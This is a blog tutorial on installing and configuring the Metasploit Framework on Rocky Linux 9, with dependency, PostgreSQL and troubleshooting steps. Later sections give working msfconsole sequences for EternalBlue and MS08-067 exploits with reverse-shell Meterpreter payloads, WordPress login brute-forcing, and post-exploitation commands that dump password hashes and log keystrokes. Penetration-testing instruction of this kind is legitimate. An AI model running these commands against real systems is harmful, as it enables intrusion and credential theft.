RHEL BasedRocky Linux

How To Install Metasploit on Rocky Linux 9

r00t

Install Metasploit on Rocky Linux 9

In this tutorial, we will show you how to install Metasploit on Rocky Linux 9. Metasploit Framework stands as one of the most powerful penetration testing tools available to cybersecurity professionals today. This robust toolkit enables security experts to identify, exploit, and validate vulnerabilities within network infrastructures and applications. For organizations running Rocky Linux 9, implementing Metasploit provides a critical capability for enhancing security posture through thorough security assessments. This guide walks you through the complete process of installing and configuring Metasploit on Rocky Linux 9, RHEL’s community-driven enterprise-grade distribution.

Understanding Metasploit Framework

Metasploit Framework is an advanced open-source platform designed for developing, testing, and executing exploits against remote target systems. Developed and maintained by Rapid7, this sophisticated tool has become the industry standard for security professionals, ethical hackers, and system administrators worldwide.

The framework consists of several key components working together to create a comprehensive penetration testing environment:

  • MSFconsole: The primary command-line interface for interacting with the framework
  • Modules: Collections of exploits, payloads, encoders, and auxiliary functionality
  • Database Backend: Typically PostgreSQL, for storing scan results and session information
  • Meterpreter: An advanced payload that provides an interactive shell for post-exploitation activities

Security professionals choose Metasploit for numerous reasons. Its modular architecture allows for seamless integration of new exploits and tools. The framework provides extensive capabilities for vulnerability scanning, exploitation, privilege escalation, and post-exploitation activities. Additionally, its active development community ensures regular updates to address emerging threats and vulnerabilities.

Prerequisites for Installation

Before proceeding with Metasploit installation on Rocky Linux 9, ensure your system meets these fundamental requirements:

  • A server or workstation running Rocky Linux 9 (fully updated)
  • Minimum system specifications:
    • 2+ CPU cores
    • 4GB RAM (8GB recommended for optimal performance)
    • 20GB available storage space
  • Root or sudo access privileges
  • Active internet connection for downloading packages
  • Basic familiarity with Linux command-line operations

For optimal security testing, it’s highly recommended to use a dedicated system or virtual machine. This approach prevents potential conflicts with production environments and provides a controlled testing environment. Additionally, having a fresh OS installation minimizes the risk of compatibility issues during the installation process.

Preparing Your Rocky Linux 9 System

Proper system preparation forms the foundation for a successful Metasploit installation. Follow these steps to ensure your Rocky Linux 9 environment is properly configured:

1. Update your system repositories and packages:

sudo dnf clean all
sudo dnf update -y

2. Verify your system is up-to-date by checking the kernel version:

uname -r

3. Configure your network settings appropriately. For security testing, consider using a dedicated network interface:

ip addr show

4. If you’re using the system firewall, create appropriate exceptions:

sudo firewall-cmd --permanent --add-service=postgresql
sudo firewall-cmd --reload

Taking the time to properly prepare your system significantly reduces the likelihood of encountering errors during the installation and configuration process. Remember that Metasploit is a complex framework with numerous dependencies, so a clean starting point is essential.

Installing Required Dependencies

Metasploit relies on several key dependencies to function properly. Installing these components first ensures a smooth installation process:

1. Install development tools and essential packages:

sudo dnf install curl gpg gcc-c++ make automake autoconf git subversion -y

2. Install Ruby dependencies (Metasploit is primarily written in Ruby):

sudo dnf install ruby ruby-devel rubygems -y

3. Install PostgreSQL database server:

sudo dnf install postgresql postgresql-server postgresql-devel -y

4. Install additional required libraries:

sudo dnf install libpcap-devel libsqlite3-devel nmap -y

5. Verify successful installation of critical dependencies:

ruby --version
postgres --version

Each of these components plays a vital role in the Metasploit ecosystem. The development tools enable proper compilation of native extensions, while PostgreSQL provides the database backend for storing security testing data. Missing dependencies often lead to cryptic error messages during framework initialization, so thorough verification is recommended.

Installing Metasploit on Rocky Linux 9

With dependencies in place, you can now install Metasploit Framework using the Rapid7 installer script. This method ensures you get the latest stable version with all components properly configured:

1. Download and execute the Metasploit installer script:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

2. The installer will add the appropriate repositories and install the Metasploit package. The process may take several minutes to complete.

3. Verify the installation was successful:

msfconsole -v

Alternatively, if you prefer a manual installation approach, you can clone the repository directly:

sudo git clone https://github.com/rapid7/metasploit-framework.git /opt/metasploit-framework
cd /opt/metasploit-framework
sudo gem install bundler
sudo bundle install

However, the installer script method is generally recommended as it handles dependency resolution and path configuration automatically.

If you encounter permission issues during installation, ensure you’re using sudo for the appropriate commands. The installation directory will typically be /opt/metasploit-framework, and the script automatically adds the necessary executable paths to your system.

Configuring PostgreSQL Database for Metasploit

Metasploit relies on PostgreSQL for storing vulnerability data, scan results, and session information. Proper database configuration is essential for optimal performance:

1. Initialize the PostgreSQL database service:

sudo postgresql-setup --initdb --unit postgresql

2. Start and enable the PostgreSQL service:

sudo systemctl start postgresql
sudo systemctl enable postgresql

3. Configure PostgreSQL authentication by editing the configuration file:

sudo vi /var/lib/pgsql/data/pg_hba.conf

4. Locate the line that contains “local all all” and change the authentication method from “peer” to “md5”:

# TYPE  DATABASE        USER            ADDRESS                 METHOD
local   all             all                                     md5

5. Save and close the file, then restart PostgreSQL:

sudo systemctl restart postgresql

6. Create a database user for Metasploit:

sudo -u postgres createuser -P msf

7. When prompted, set a secure password for the database user.

8. Create a database for Metasploit and assign it to the user:

sudo -u postgres createdb -O msf msf

9. Test the database connection:

psql -h localhost -U msf -d msf

The database configuration establishes the foundation for Metasploit’s data storage capabilities. A properly configured database allows Metasploit to store information about discovered vulnerabilities, maintain session data, and preserve your work between framework sessions.

Initializing and Launching Metasploit

With Metasploit installed and the database configured, it’s time to initialize the framework and launch the console:

1. Initialize the Metasploit database:

sudo msfdb init

2. This command performs several key tasks:

  • Creates necessary database schemas
  • Generates configuration files
  • Sets up the initial framework environment

3. Launch the Metasploit console:

msfconsole

4. Verify the database connection from within the console:

msf6 > db_status

The output should confirm that the connection to the PostgreSQL database is functioning correctly. If you encounter connection issues, ensure that the PostgreSQL service is running and that the database configuration is correct.

For convenience, you can create aliases or shortcuts to common Metasploit commands by adding them to your .bashrc file:

echo 'alias msf="msfconsole"' >> ~/.bashrc
source ~/.bashrc

Basic Metasploit Usage for Beginners

Once you’ve successfully launched the Metasploit console, familiarize yourself with these essential commands to navigate the framework effectively:

1. Getting help:

msf6 > help

2. Searching for exploits:

msf6 > search type:exploit platform:windows

3. Using a specific exploit:

msf6 > use exploit/windows/smb/ms08_067_netapi

4. Viewing exploit options:

msf6 > show options

5. Setting required parameters:

msf6 > set RHOSTS 192.168.1.10
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.5

6. Running the exploit:

msf6 > exploit

7. Managing active sessions:

msf6 > sessions -l
msf6 > sessions -i 1

Understanding the flow of operations in Metasploit is critical for effective security testing. A typical workflow involves searching for appropriate exploits, configuring necessary parameters, executing the exploit, and then managing the resulting session for post-exploitation activities. Metasploit’s modular design allows for tremendous flexibility in this process.

Advanced Configuration Options

As you become more proficient with Metasploit, explore these advanced configuration options to enhance your security testing capabilities:

1. Customize the database configuration by editing:

sudo nano /usr/share/metasploit-framework/config/database.yml

2. Set up workspaces to organize different projects:

msf6 > workspace -a project_name
msf6 > workspace project_name

3. Configure resource scripts for automation:

echo "use auxiliary/scanner/smb/smb_version" > scan.rc
echo "set RHOSTS 192.168.1.0/24" >> scan.rc
echo "run" >> scan.rc

4. Execute resource scripts:

msf6 > resource scan.rc

5. Set up custom module paths:

msf6 > set ModulePath /custom/modules/path

6. Configure performance settings in advanced installations:

sudo nano /etc/metasploit-framework/msfconsole.rc

These advanced configurations allow you to tailor Metasploit to your specific security testing requirements. Resource scripts, in particular, enable automation of repetitive tasks, significantly increasing productivity during complex security assessments.

Keeping Metasploit Updated

Security tools require regular updates to remain effective against emerging threats. Follow these practices to keep your Metasploit installation current:

1. Update Metasploit manually:

msfupdate

2. Set up automatic updates using cron:

echo "0 0 * * * msfupdate > /var/log/msfupdate.log 2>&1" | sudo tee -a /etc/crontab

3. Update the module database from within the console:

msf6 > db_rebuild_cache

4. Check your current version:

msf6 > version

5. Update underlying dependencies:

sudo dnf update ruby postgresql -y

Regular updates ensure you have access to the latest exploits, payloads, and security fixes. The Metasploit development community constantly adds new capabilities and refines existing ones, making updates essential for effective security testing.

Troubleshooting Common Metasploit Issues

Even with careful installation, you might encounter issues with Metasploit. Here are solutions to common problems:

1. Database connection issues:

  • Verify PostgreSQL is running: sudo systemctl status postgresql
  • Check database configuration: cat /usr/share/metasploit-framework/config/database.yml
  • Reinitialize the database: sudo msfdb reinit

2. Module loading problems:

  • Check module path: echo $MSF_MODULE_PATH
  • Verify file permissions: sudo chmod -R 755 /usr/share/metasploit-framework/modules/
  • Rebuild module cache: msf6 > reload_all

3. Dependency conflicts:

  • Check Ruby version compatibility: ruby -v
  • Reinstall problematic gems: gem install bundler --no-document
  • Consider a clean reinstallation if problems persist: 
    sudo dnf remove metasploit-framework -y
rm -rf ~/.msf4
sudo dnf autoremove -y
# Then reinstall using the methods described earlier

4. Permission-related errors:

  • Ensure proper ownership: sudo chown -R $(whoami):$(whoami) ~/.msf4/
  • Check for SELinux interference: sudo setenforce 0 (temporarily)
  • Set proper context: sudo restorecon -Rv /opt/metasploit-framework/

5. Performance issues:

  • Increase available RAM
  • Optimize PostgreSQL settings: sudo nano /var/lib/pgsql/data/postgresql.conf
  • Limit active modules: msf6 > loadpath /specific/modules/only

Persistent troubleshooting issues may require a complete reinstallation of Metasploit. If that becomes necessary, ensure you back up any custom modules or configurations before proceeding.

Real-World Usage Examples

Understanding theoretical concepts is important, but seeing practical applications helps solidify knowledge. Here are real-world examples of using Metasploit for security testing:

Example 1: Basic vulnerability scanning

msf6 > use auxiliary/scanner/smb/smb_version
msf6 > set RHOSTS 192.168.1.0/24
msf6 > run

This scans the network for SMB services and identifies vulnerable versions.

Example 2: Testing web application security

msf6 > use auxiliary/scanner/http/wordpress_login_enum
msf6 > set RHOSTS target-website.com
msf6 > set TARGETURI /wp-login.php
msf6 > run

This tests WordPress installations for weak credentials.

Example 3: Network reconnaissance

msf6 > use auxiliary/scanner/discovery/udp_sweep
msf6 > set RHOSTS 10.0.0.0/24
msf6 > run

This identifies active services using UDP protocols.

Example 4: Targeted exploit execution

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.25
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > exploit

This executes the EternalBlue exploit against a vulnerable Windows system.

Example 5: Post-exploitation techniques

meterpreter > hashdump
meterpreter > screenshot
meterpreter > keyscan_start

These commands gather credentials, capture screens, and log keystrokes after successful exploitation.

Congratulations! You have successfully installed Metasploit. Thanks for using this tutorial for installing Metasploit on your Rocky Linux 9 system. For additional help or useful information, we recommend you check the official Metasploit website.

VPS Manage Service Offer
If you don’t have time to do all of this stuff, or if this is not your area of expertise, we offer a service to do “VPS Manage Service Offer”, starting from $10 (Paypal payment). Please contact us to get the best deal!
Tags
r00t
Photo of r00t

r00t

r00t is an experienced Linux enthusiast and technical writer with a passion for open-source software. With years of hands-on experience in various Linux distributions, r00t has developed a deep understanding of the Linux ecosystem and its powerful tools. He holds certifications in SCE and has contributed to several open-source projects. r00t is dedicated to sharing her knowledge and expertise through well-researched and informative articles, helping others navigate the world of Linux with confidence.
Copyright © 2025 idroot.us | All Rights Reserved | Follow us for more Linux tutorials!
Back to top button